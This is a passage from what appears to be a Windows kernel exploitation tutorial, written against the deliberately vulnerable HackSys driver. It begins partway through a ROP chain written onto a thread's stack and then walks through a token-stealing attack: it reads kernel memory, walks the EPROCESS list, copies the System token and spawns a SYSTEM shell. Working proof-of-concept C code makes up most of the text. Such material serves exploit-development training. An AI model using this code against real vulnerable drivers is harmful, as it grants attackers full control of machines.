Unable to find ntdll!NtQuerySystemInformation\n"); return FALSE; } printf("[+] Found ntdll!NtQuerySystemInformation\n"); ULONG returnLen = 0x1000; NTSTATUS status; PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen); do { if (SystemHandleInfo) { HeapFree(GetProcessHeap(), 0, SystemHandleInfo); } SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen); if (!SystemHandleInfo) { printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError()); return FALSE; } status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen); } while (status == STATUS_INFO_LENGTH_MISMATCH); PVOID dKTHREAD = NULL; for (ULONG i = 0; i < SystemHandleInfo->NumberOfHandles; i++) { if (SystemHandleInfo->Handles[i].UniqueProcessId == GetCurrentProcessId()) { if (dHandle == (HANDLE)SystemHandleInfo->Handles[i].HandleValue) { dKTHREAD = SystemHandleInfo->Handles[i].Object; printf("[+] Found KTHREAD of the dummy thread %p\n", dKTHREAD); free(SystemHandleInfo); return dKTHREAD; } } } } PVOID kernelRead(PVOID readAddr, HANDLE hDriver) { WRITE_WHAT_WHERE input; LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE); input.WHAT = (LPVOID)(readAddr); input.WHERE = (LPVOID)(storeAddr); printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr); NTSTATUS success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return FALSE; } LPVOID* data = (LPVOID*)storeAddr; return *data; } PVOID kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) { WRITE_WHAT_WHERE input; input.WHAT = (LPVOID)(&data); input.WHERE = (LPVOID)(writeAddr); printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr); NTSTATUS success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { printf("success\n"); } else { printf("failed\n"); return FALSE; } } int main() { printf("[+] Opening handle to driver\n"); HANDLE hDriver = CreateFileW( L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr); if (hDriver == INVALID_HANDLE_VALUE) { printf("[!] Failed to open handle: %d", GetLastError()); return 1; } // Step 1 printf("[+] Creating a dummy thread..\n"); HANDLE dHandle = fakethread(); if (!dHandle) { return 1; } getchar(); // Step 2 PVOID dKTHREAD = findKTHREAD(dHandle); if (dKTHREAD == NULL) { printf("[-] Unable to find KTHREAD of the dummy thread!\n"); return 1; } getchar(); // Step 3 PVOID stackLimit = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x30), hDriver); printf("[+] Dummy thread's StackLimit: %p\n", stackLimit); PVOID stackBase = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x38), hDriver); printf("[+] Dummy thread's StackBase: %p\n", stackBase); getchar(); // Step 4 LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe"); printf("[+] Nt base address: %p\n", nt_addr); int stackSize = (uintptr_t)stackBase - (uintptr_t)stackLimit; PVOID retAddr = NULL; PVOID stackRet = NULL; for (int i = 0x8; i < stackSize - 0x8; i += 0x8) { retAddr = kernelRead(PVOID((uintptr_t)stackBase - i), hDriver); if (retAddr == PVOID((uintptr_t)nt_addr + 0x00403bef)) // nt!KiApcInterrupt+0x2ff { printf("[+] Found nt!KiApcInterrupt+0x2ff in the stack %p\n", PVOID((uintptr_t)stackBase - i)); stackRet = PVOID((uintptr_t)stackBase - i); break; } } getchar(); // Step 5 // RCX - ProcessHandle HANDLE hSystem = NULL; // R8 - ObjectAttributes OBJECT_ATTRIBUTES objAttrs = { 0 }; memset(&objAttrs, 0, sizeof(objAttrs)); objAttrs.ObjectName = NULL; objAttrs.Length = sizeof(objAttrs); // R9 - ClientId CLIENT_ID clientId = { 0 }; clientId.UniqueProcess = ULongToHandle(4); clientId.UniqueThread = NULL; LPVOID rop[] = { (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret (LPVOID)&hSystem, // Handle (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret (LPVOID)PROCESS_ALL_ACCESS, (LPVOID)((uintptr_t)nt_addr + 0x00201861), // pop r8; ret (LPVOID)&objAttrs, (LPVOID)((uintptr_t)nt_addr + 0x00201862), // pop rax; ret (LPVOID)&clientId, (LPVOID)((uintptr_t)nt_addr + 0x00343f0e), // mov r9, rax; mov rax, r9; add rsp, 0x28; ret; (LPVOID)(0x4141414141414141), // 0x8 (LPVOID)(0x4141414141414141), // 0x10 (LPVOID)(0x4141414141414141), // 0x18 (LPVOID)(0x4141414141414141), // 0x20 (LPVOID)(0x4141414141414141), // 0x28 (LPVOID)((uintptr_t)nt_addr + 0x003fb260), // nt!ZwOpenProcess (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret (LPVOID)(ULONG64)dHandle, // Thread Handle (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret (LPVOID)(0x0000000000000000), (LPVOID)((uintptr_t)nt_addr + 0x003fb800), // nt!ZwTerminateThread // Step 6 }; printf("[+] Writing Shellcode to the thread stack...\n"); for (int i = 0; i < sizeof(rop) / sizeof(rop[0]); i++) { kernelWrite((rop[i]), stackRet, hDriver); stackRet = (LPVOID)((uintptr_t)stackRet + 0x8); } getchar(); // Step 7 ResumeThread(dHandle); Sleep(2000); printf("[+] System process Handle 0x%lx\n", hSystem); getchar(); CloseHandle(dHandle); CloseHandle(hDriver); getchar(); return 0; }
Method (5) - Token Stealing
The next method is about Token Stealing, which leverages a Write-What-Where vulnerability. In this method, HVCI is enabled. However, this method is easy to perform.
Every process and thread has “Token” which represents the security context of the process or thread, containing information about the user account, group memberships, privileges, and access rights. The below image from Process Hacker is the “Token” of the system process, stealing that would give us the same permission as system.
Before getting into writing the exploit, we need to know some basic things which we need for the POC.
Each process has this Token
which is an _EX_FAST_REF
union and it can be accessed from EPROCESS
structure.
EPROCESS structure contains a member called ActiveProcessLinks
which is a double linked list and it points to the next process’s EPROCESS.ActiveProcessLinks
and the UniqueProcessId
member is the PID of the specific process.
With the above information, we gonna follow these steps:
- Step 1: Leak the system’s EPROCESS structure.
- Step 2: With the EPROCESS structure of system, we gonna get the
ActiveProcessLinks
member and find our exploit’s EPROCESS structure with the help ofUniqueProcessId
member. - Step 3: Steal the system’s
EPROCESS.Token
value. - Step 4: Retrieve our exploit’s
EPROCESS.Token
value. - Step 5: Overwrite our exploit’s
EPROCESS.Token
value with system’sToken
.
Step 1: Leak system’s EPROCESS structure
To find system’s EPROCESS structure we can use same method as what we did in “Method (4)” with the help of NtQuerySystemInformation()
, we can get every handle’s object address and through that we search for the handle of the system
process.
Interestingly, System’s first handle is the handle of it’s own process, that makes the work really easy.
Here is the updated code to get the EPROCESS structure of the system process:
- Like before, we are getting every handle in the machine using
NtQuerySystemInformation()
. - Then we get the very first handle (
SYSTEM_HANDLE_INFORMATION
) and check if theUniqueProcessId
(which is the PID) is “4”, because the first handle is always the handle to thesystem
process itself andsystem
’s PID is always 4. - If the
UniqueProcessId
of the first handle is 4, then we get the handle’sObject
, this is theEPROCESS
address of the system itself. - As I showed in the above Process Hacker image, the first handle is always the handle to the process itself. Since the
Object
is “Process”, the address associated with it is the address of EPROCESS.
PVOID findEPROCESS() {
pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation) {
printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
return FALSE;
}
printf("[+] Found ntdll!NtQuerySystemInformation\n");
ULONG returnLen = 0x1000;
NTSTATUS status;
PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen);
do {
if (SystemHandleInfo) {
HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
}
SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
if (!SystemHandleInfo) {
printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
return FALSE;
}
status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
} while (status == STATUS_INFO_LENGTH_MISMATCH);
PVOID sysEPROCESS = NULL;
if (SystemHandleInfo->Handles[0].UniqueProcessId == 4) {
sysEPROCESS = SystemHandleInfo->Handles[0].Object;
printf("[+] Found EPROCESS of the system %p\n", sysEPROCESS);
return sysEPROCESS;
}
else {
return sysEPROCESS;
}
}
int main()
{
[::]
// Step 1
PVOID sysEPROCESS = findEPROCESS();
if (sysEPROCESS == NULL) {
printf("[-] Unable to find EPROCESS of the system.exe!\n");
return 1;
}
[::]
}
Executed the POC and the retrieved EPROCESS address of the system and it is as same as the “Process” handle’s address.
This can also be verified using !process
command from WinDBG with the retrieved address. We can see the Image
as System
, so this concludes we got the EPROCESS
structure of the system
process.
Step 2: Find exploit’s EPROCESS structure
Now that we get the EPROCESS address of the system
process, we can begin a loop on the double linked list (ActiveProcessLink
) to get the address of next process’s EPROCESS.ActiveProcessLinks
address.
- I copied the offset of the required values from
EPROCESS
structure and using#define
stored those offsets for easy accessible. - Begin this by getting the current process ID using
GetCurrentProcessId()
and stored that inpid
. - Retrieved the address of first
EPROCESS.ActiveProcessLinks
and stored that inSysProcHead
. - Then the
while
loop begins to find the EPROCESS of the exploit (current) process. - I used the same
kernelRead
function here and it reads the next process’sEPROCESS.ActiveProcessLinks
and stored that innextProc
. - Then from the
nextProc
, subtracted the offset ofActiveProcessLinks
to get to the beginning ofEPROCESS
structure of that process. BecauseActiveProcessLinks
doubled linked list always points to next process’sEPROCESS.ActiveProcessLinks
notEPROCESS
itself. - Then I get the address of
UniqueProcessId
of thatEPROCESS
structure and again usingkernelRead
, read the value and store that tofoundpid
, so if this is not the same PID of the exploit process, then the loop continues.
#define Offset_ActiveProcessLinks 0x448
#define Offset_UniqueProcessId 0x440
#define Offset_Token 0x4b8
[::]
// Step 2
printf("[+] Attempting to find EPROCESS address of the current process...\n");
DWORD pid = GetCurrentProcessId();
printf("[+] Current Process ID: 0x%lx\n", pid);
PVOID SysProcHead = PVOID((uintptr_t)sysEPROCESS + Offset_ActiveProcessLinks);
DWORD foundpid = 0;
PVOID nextPid = 0;
PVOID nextProc = sysEPROCESS;
while (pid != foundpid) {
nextProc = kernelRead(PVOID((uintptr_t)nextProc + Offset_ActiveProcessLinks), hDriver);
nextProc = PVOID((uintptr_t)nextProc - Offset_ActiveProcessLinks);
nextPid = PVOID((uintptr_t)nextProc + Offset_UniqueProcessId);
foundpid = (DWORD)kernelRead(nextPid, hDriver);
if (SysProcHead == nextProc) {
printf("[+] Failed to find target's EPROCESS\n");
return 1;
}
}
if (nextProc == NULL) {
printf("[-] Unable to find EPROCESS of current process!\n");
return 1;
}
PVOID currentEPROCESS = nextProc;
printf("[+] Found EPROCESS address of current process: %p\n", currentEPROCESS);
Executed the POC and as expected, it found the EPROCESS
structure of the exploit (whatwhere4.exe).
Step 3: Steal system’s Token
Now we got the EPROCESS
address of both system and the exploit, we can read the Token
value of the system first. This step is just simply reading that value and store that in sysToken
.
// Step 3
PVOID sysToken = kernelRead(PVOID((uintptr_t)sysEPROCESS + Offset_Token), hDriver);
printf("[+] System's EPROCESS.Token value: %p\n", sysToken);
The updated code retrieved the Token
value of the system process.
Step 4: Retrieve exploit’s Token
This step is same as previous step, instead we read the Token
value of the exploit (whatwhere4.exe).
// Step 4
PVOID curToken = kernelRead(PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
printf("[+] Current Process's EPROCESS.Token value: %p\n", curToken);
The reason to get this value instead of directly overwriting the Token
is, the _EX_FAST_REF
is an union and it contains RefCnt
which is the reference count and it should not be disturbed, if it’s wrong it might lead to BSOD.
Step 5: Replace the Token value
Now we overwrite the system
token on the whatwhere4.exe
token except the last bit, to avoid any disruption in the reference count. After overwriting the Token value, we launch cmd.exe
.
// Step 5
PVOID newToken = (PVOID((uintptr_t)curToken & 0xf));
newToken = (PVOID((uintptr_t)newToken | (uintptr_t)sysToken));
printf("[+] Modified EPROCESS.Token value: %p\n", newToken);
printf("[+] Attempting to overwrite current process's Token to escalate...\n");
BOOL status = kernelWrite(newToken, PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
if (!status) {
printf("[-] Failed to overwrite current process's Token value...\n");
return 1;
}
getchar();
printf("[+] Spawning a shell with elevated privileges\n\n");
system("cmd");
Got system:
Got shell as SYSTEM with HVCI enabled, we didn’t actually bypassed anything here, instead we just stole the Token of the system. But yet it’s really an effective way to get SYSTEM.
Note: Starting from Windows 11 24h2, EnumDeviceDrivers()
and NtQuerySystemInformation()
require the SeDebugPrivilege
to obtain kernel addresses. This means you must be an Administrator in order to use them on the latest Windows 11 version. This might be a trouble.
Full POC
#include <Windows.h> #include <stdio.h> #include <psapi.h> #include "header.h" #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS) typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 #define Offset_ActiveProcessLinks 0x448 #define Offset_UniqueProcessId 0x440 #define Offset_Token 0x4b8 typedef struct _WRITE_WHAT_WHERE { void* WHAT; void* WHERE; } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE; PVOID kernelRead(PVOID readAddr, HANDLE hDriver) { WRITE_WHAT_WHERE input; LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE); input.WHAT = (LPVOID)(readAddr); input.WHERE = (LPVOID)(storeAddr); // printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr); NTSTATUS success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); /* if (success) { printf("success\n"); } else { printf("failed\n"); return FALSE; } */ LPVOID* data = (LPVOID*)storeAddr; return *data; } BOOL kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) { WRITE_WHAT_WHERE input; input.WHAT = (LPVOID)(&data); input.WHERE = (LPVOID)(writeAddr); // printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr); NTSTATUS success = DeviceIoControl( hDriver, WRITE_WHAT_WHERE_IOCTL, &input, sizeof(input), nullptr, 0, nullptr, nullptr); if (success) { return TRUE; } else { return FALSE; } } PVOID findEPROCESS() { pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress( GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to find ntdll!NtQuerySystemInformation\n"); return FALSE; } printf("[+] Found ntdll!NtQuerySystemInformation\n"); ULONG returnLen = 0x1000; NTSTATUS status; PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen); do { if (SystemHandleInfo) { HeapFree(GetProcessHeap(), 0, SystemHandleInfo); } SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen); if (!SystemHandleInfo) { printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError()); return FALSE; } status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen); } while (status == STATUS_INFO_LENGTH_MISMATCH); PVOID sysEPROCESS = NULL; if (SystemHandleInfo->Handles[0].UniqueProcessId == 4) { sysEPROCESS = SystemHandleInfo->Handles[0].Object; printf("[+] Found EPROCESS of the system %p\n", sysEPROCESS); return sysEPROCESS; } else { return sysEPROCESS; } } int main() { printf("[+] Opening handle to driver\n"); HANDLE hDriver = CreateFileW( L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr); if (hDriver == INVALID_HANDLE_VALUE) { printf("[!] Failed to open handle: %d", GetLastError()); return 1; } // Step 1 PVOID sysEPROCESS = findEPROCESS(); if (sysEPROCESS == NULL) { printf("[-] Unable to find EPROCESS of the system.exe!\n"); return 1; } getchar(); // Step 2 printf("[+] Attempting to find EPROCESS address of the current process...\n"); DWORD pid = GetCurrentProcessId(); printf("[+] Current Process ID: 0x%lx\n", pid); PVOID SysProcHead = PVOID((uintptr_t)sysEPROCESS + Offset_ActiveProcessLinks); DWORD foundpid = 0; PVOID nextPid = 0; PVOID nextProc = sysEPROCESS; while (pid != foundpid) { nextProc = kernelRead(PVOID((uintptr_t)nextProc + Offset_ActiveProcessLinks), hDriver); nextProc = PVOID((uintptr_t)nextProc - Offset_ActiveProcessLinks); nextPid = PVOID((uintptr_t)nextProc + Offset_UniqueProcessId); foundpid = (DWORD)kernelRead(nextPid, hDriver); if (SysProcHead == nextProc) { printf("[+] Failed to find target's EPROCESS\n"); return 1; } } if (nextProc == NULL) { printf("[-] Unable to find EPROCESS of current process!\n"); return 1; } PVOID currentEPROCESS = nextProc; printf("[+] Found EPROCESS address of current process: %p\n", currentEPROCESS); getchar(); // Step 3 PVOID sysToken = kernelRead(PVOID((uintptr_t)sysEPROCESS + Offset_Token), hDriver); printf("[+] System's EPROCESS.Token value: %p\n", sysToken); getchar(); // Step 4 PVOID curToken = kernelRead(PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver); printf("[+] Current Process's EPROCESS.Token value: %p\n", curToken); getchar(); // Step 5 PVOID newToken = (PVOID((uintptr_t)curToken & 0xf)); newToken = (PVOID((uintptr_t)newToken | (uintptr_t)sysToken)); printf("[+] Modified EPROCESS.Token value: %p\n", newToken); printf("[+] Attempting to overwrite current process's Token to escalate...\n"); BOOL status = kernelWrite(newToken, PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver); if (!status) { printf("[-] Failed to overwrite current process's Token value...\n"); return 1; } getchar(); printf("[+] Spawning a shell with elevated privileges\n\n"); system("cmd"); return 0; }
Reference:
- https://www.crowdstrike.com/en-us/blog/state-of-exploit-development-part-1/
- https://poppopret.blogspot.com/2011/07/windows-kernel-exploitation-basics-part.html
- https://connormcgarr.github.io/Kernel-Exploitation-2/
- https://connormcgarr.github.io/pte-overwrites/
- https://connormcgarr.github.io/hvci/
- https://msrc.microsoft.com/blog/2022/04/randomizing-the-kuser_shared_data-structure-on-windows/
- https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntexapi_x/kuser_shared_data/index.htm
- https://fourcore.io/blogs/how-a-windows-process-is-created-part-2